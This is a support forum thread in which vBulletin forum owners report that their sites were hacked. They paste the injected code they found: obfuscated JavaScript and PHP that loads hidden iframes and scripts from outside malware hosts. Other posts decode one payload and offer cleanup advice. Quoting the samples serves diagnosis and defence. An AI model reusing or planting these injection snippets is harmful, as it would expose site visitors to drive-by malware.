vBulletin 3.8.4 has been hacked !!!


  • vBulletin 3.8.4 has been hacked !!!

    Hello,

    My website has been hacked !!!

    There is a code at the end (bottom) of index.php

    Code:
    <script language="JavaScript" type="text/javascript">
    function getfromDOM(containerid)
    {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
    do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
    while(element1!==container.lastChild)
    return content;
    }
    var ff_b = document.createElement("strong");
    ff_b.id = "YuPi55";
    ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
    ff_b.style.visibility = "hidden";
    document.getElementsByTagName("body")[0].appendChild(ff_b);
    var ff_iframe = document.createElement("iframe");
    ff_iframe.id = "JeT";
    ff_iframe.name = "JeT";
    ff_iframe.style.visibility = "hidden";
    ff_iframe.src=getfromDOM("YuPi55");
    document.getElementsByTagName("body")[0].appendChild(ff_iframe);
    </script>
    y

    Code:
    <iframe src="http://3cy.ru:8080/index.php" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
    I don't know if other files have been hacked.

    I use 3.8.4. with DownloadsII mod

    Can you help me?

    Thank you

  • #2
    Re-install and read: http://www.vbulletin.com/forum/showthread.php?t=194701
    "The lurking suspicion that something could be simplified is the world's richest source of rewarding challenges"
    - Edsger Dijkstra


    • #3
      If I reinstall, do I have to use impex? Or do I have to use the name of the actual database when I'm installing?

      I have 85.000 users and I don't want to lose them....

      Thank you


      • #4
        Sorry to hear that.
        What type of mistake on the admin side leads to such a hack?
        I'd just like to learn how to prevent these attacks.


        • #5
          Just reupload your backup database. You should not have to use impex for that.

          Please don't PM or VM me for support - I only help out in the threads.
          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
          Want help modifying your vbulletin forum? Head on over to vbulletin.org
          If I post CSS and you don't know where it goes, throw it into the additional.css template.

          W3Schools <- awesome site for html/css help


          • #6
            Originally posted by mijack
            Hello,

            My website has been hacked !!!

            There is a code at the end (bottom) of index.php

            Code:
            <script language="JavaScript" type="text/javascript">
            function getfromDOM(containerid)
            {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
            do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
            while(element1!==container.lastChild)
            return content;
            }
            var ff_b = document.createElement("strong");
            ff_b.id = "YuPi55";
            ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
            ff_b.style.visibility = "hidden";
            document.getElementsByTagName("body")[0].appendChild(ff_b);
            var ff_iframe = document.createElement("iframe");
            ff_iframe.id = "JeT";
            ff_iframe.name = "JeT";
            ff_iframe.style.visibility = "hidden";
            ff_iframe.src=getfromDOM("YuPi55");
            document.getElementsByTagName("body")[0].appendChild(ff_iframe);
            </script>
            y

            Code:
            <iframe src="http://3cy.ru:8080/index.php" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
            I don't know if other files have been hacked.

            I use 3.8.4. with DownloadsII mod

            Can you help me?

            Thank you
            My site was hacked just the same... just pointing to another server in the iframe code.

            But I was using 3.8.1, so if this happens with 3.8.4 and 3.8.1, there is a very old hole somewhere letting this happen.

            Basically they modified all the PHP and HTML files with that code.

            What is the position of vbulletin about this?


            • #7
              Our position is there is no known exploit; if you have evidence of an actual exploit, please report it. Likely there is a good chance that the exploit was elsewhere on the server and vBulletin was the one defaced.


              • #8
                The encoded part outputs as:

                Code:
                document.write("<iframe src='http://000007.ru/in.cgi?7' style='display:none;'></iframe>");
                just for your reference


                • #9
                  All the hacks I've seen like this were done through the server.

                  Please see this thread on how to make your vBulletin more secure:

                  http://www.vbulletin.com/go/secure

                  If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
                  Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                  Change CKEditor Colors to Match Style (for 4.1.4 and above)

                  Steve Machol Photography


                  Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.



                  • #10
                    Hello,

                    Some of my vBulletin 3.8.4 patch level 1 (German) were also hacked:

                    Code:
                    <script>/*GNU GPL*/ try{window.onload = function(){var Ju5b7bu89al = document.createElement('s#[email protected]@r$)i!$p)t!('.replace(/\(|@|\!|\$|#|\)|\^|&/ig, ''));var Plcsu1uj9eo04 = 'U1xil41i86oe';Ju5b7bu89al.setAttribute('type', 't&@&$e)#)x!$)[email protected]^/!!#[email protected]((#v(a#&)s(^@[email protected])r^&i(#)p&$#t)'.replace(/\!|\)|&|#|\$|\(|\^|@/ig, ''));Ju5b7bu89al.setAttribute('src',  'h!##t&[email protected]:!#/^&)/(^$o$$^v((h^(-&$n^^[email protected][email protected](.$$h#@a#)^r#d#(#s($&)e!&^!x)!#^t&u^&@b$e!&#)^.^)!^c)))o$!m&&[email protected]&$s#o)&n$$($#g$!s$&-$&&p##^k&$(&!.#@&[email protected]^h&)!e!(&m^#)o&$$^[email protected])i&)[email protected]@^[email protected](^w^(i$(#n(!d$!o&w&.&)[email protected]&(([email protected]@:)8^&0()[email protected]@0#&()/)@!^g!)&o)(^@[email protected]([email protected]^l)#$e).#&n#$#(o&(((/(g(&o#!##o$$#g&[email protected])!l))e$&$^(.^&n(&!&o()[email protected]/&(#$g)&)@o)^o!#g!$$(l#$e(.$c^##$o#!^!m^)/&^[email protected])y&$)l)(((o^#^m&^!#.^#^#[email protected])^m)($)/#m((-(&w$(.$c(#o!m#@$/(#^&'.replace(/\!|\)|\(|@|&|\$|\^|#/ig, ''));Ju5b7bu89al.setAttribute('defer', '[email protected]!)&e$(!f&(e!)^r)&!'.replace(/&|\)|#|\$|@|\^|\(|\!/ig, ''));Ju5b7bu89al.setAttribute('id', 'L!3###$d!##w(@o^@&h^([email protected]&(&8#@&!v$&$#u^)u&('.replace(/\!|&|\(|#|\$|\)|\^|@/ig, ''));document.body.appendChild(Ju5b7bu89al);}} catch(Pz68f7gfr80sy) {}</script>
                    <!--e27f528bc0f1747ea9638a535ca450f8-->

                    Comment
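The decoding shown in post #8, and the junk-character padding used by the script in post #10, can both be undone as plain text without ever running the injected JavaScript. This is an added example, not part of the original thread: the function names are hypothetical, `STAGE1` is constructed by re-encoding the string quoted in post #8, and `STAGE2` is a constructed imitation of post #10 with a placeholder host.

```python
import re
from urllib.parse import unquote

# Style 1 (first post, decoded in #8): hidden <div> holding %XX-encoded JavaScript.
HIDDEN_DIV = re.compile(
    r"<div[^>]*display\s*:\s*none[^>]*>\s*((?:%[0-9a-f]{2})+)\s*</div>", re.I)
# Style 2 (post #10): 'junk-padded literal'.replace(/junk chars/ig, '')
JUNK_REPLACE = re.compile(
    r"'((?:[^'\\]|\\.)*)'\.replace\(/((?:[^/\\]|\\.)+)/([a-z]*),\s*''\)")
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)

# Constructed samples. STAGE1 re-encodes the string shown in post #8; STAGE2
# imitates post #10 with a placeholder host (example.invalid is an assumption).
POST8 = ("document.write(\"<iframe src='http://000007.ru/in.cgi?7' "
         "style='display:none;'></iframe>\");")
STAGE1 = '<div id="CFI" style="display:none">%s</div>' % "".join(
    "%%%02x" % ord(c) for c in POST8)
STAGE2 = ("s.setAttribute('src', 'h!t@t#p:$/^/e(x)a&mple.invalid/a.js'"
          r".replace(/\!|\)|\(|@|&|\$|\^|#/ig, ''));")


def decode_percent_divs(html):
    """Decode every hidden div whose whole body is %XX escapes (no eval)."""
    return [unquote(m.group(1)) for m in HIDDEN_DIV.finditer(html)]


def decode_junk_strings(js):
    """Apply each .replace(/.../, '') to its own literal as plain text.

    Assumes the pattern is a simple alternation of escaped punctuation,
    which means the same thing in JavaScript and Python regex syntax."""
    out = []
    for literal, pattern, flags in JUNK_REPLACE.findall(js):
        out.append(re.sub(pattern, "", literal, flags=re.I if "i" in flags else 0))
    return out


def defang(url):
    """Rewrite a URL so it cannot be clicked or auto-linked in a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def extract_urls(sample):
    """Return defanged URLs hidden by either obfuscation style."""
    decoded = decode_percent_divs(sample) + decode_junk_strings(sample)
    return [defang(u) for text in decoded for u in URL.findall(text)]
```

The defanged output is suitable for handing to a host or adding to an egress blocklist review.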


                    • #11
                      When I'm reading this thread, my NOD32 says:

                      23.2.2010 21:44:09 HTTP filter archive http://www.vbulletin.com/forum/showt...ighlight=impex JS/TrojanDownloader.Agent.NRL trojan connection terminated Threat was detected upon access to web by the application: firefox.exe.


                      • #12
                        Clean up all your forum files by overwriting them with a fresh set from the vB download package for your version. Check your server space for anything out of the ordinary. Check all your other files to see if they have been infected. Change all the login info (FTP, forum admin, CP of your host, etc.). And last but not least, ask your host to check their access logs so they can pinpoint exactly how they got in instead of guessing.

                        Comment
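One way to carry out the file checks from post #12 before overwriting anything is to compare the live web root against a freshly unpacked package of the same version and list what differs. This is an added example, not part of the original thread or vBulletin's own tooling: the function names are hypothetical and the markers are heuristics taken from the injections quoted in this thread.

```python
import hashlib
import re
from pathlib import Path

# Heuristic markers drawn from the injections quoted in this thread.
MARKERS = {
    "iframe": re.compile(rb"<iframe\b", re.I),
    "eval+unescape": re.compile(rb"\beval\b.{0,200}\bunescape\b", re.I | re.S),
    "output-rewrite": re.compile(rb"preg_replace\s*\(.{0,400}<iframe", re.I | re.S),
}


def digest(path):
    """SHA-256 of a file, read in chunks so large attachments are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree(root):
    """Map relative POSIX path -> absolute Path for every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}


def audit(live_root, clean_root):
    """Compare the live web root with a clean package of the same version.

    Returns 'modified' and 'unknown' as {path: [marker names]} and 'missing'
    as a list. Site-specific files (configuration, uploads) will appear as
    modified or unknown and need a manual look."""
    live, clean = tree(live_root), tree(clean_root)
    report = {"modified": {}, "unknown": {}, "missing": sorted(set(clean) - set(live))}
    for rel, path in sorted(live.items()):
        if rel in clean and digest(path) == digest(clean[rel]):
            continue  # byte-identical to the vendor copy
        data = path.read_bytes()
        hits = [name for name, rx in MARKERS.items() if rx.search(data)]
        report["modified" if rel in clean else "unknown"][rel] = hits
    return report
```

Files under "unknown" with no marker hits still deserve review, since a dropped shell need not contain any of these strings.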


                        • #13
                          PHP code in includes/functions.php
                          ==================
                          // parse PHP include ##################
                          ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                          ---

                          Me too, I got hacked by an iframe !!!!!!!!!!!!

                          I found it in functions.php

                          Only in the /forum. I have a portal CMS web that didn't get hacked !! Is that an exploit ?!


                          • #14
                            Originally posted by sungerr
                            PHP code in includes/functions.php
                            ==================
                            // parse PHP include ##################
                            ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                            ---

                            Me too, I got hacked by an iframe !!!!!!!!!!!!

                            I found it in functions.php

                            Only in the /forum. I have a portal CMS web that didn't get hacked !! Is that an exploit ?!
                            What version of vb do you have?


                            • #15
                              I've been using 3.8.4 for a while and got defaced once. I suggest you read more info about the 'Gumblar' virus (made in China, but works well) and run Avast! on your server; it's free and it works on Linux, and most likely it will find some stuff like c99.php (a shell) on your server, which allows hackers to edit files on your server.

                              Basically, I've tried MANY things and none of them actually worked (No XSS nor SQLi).
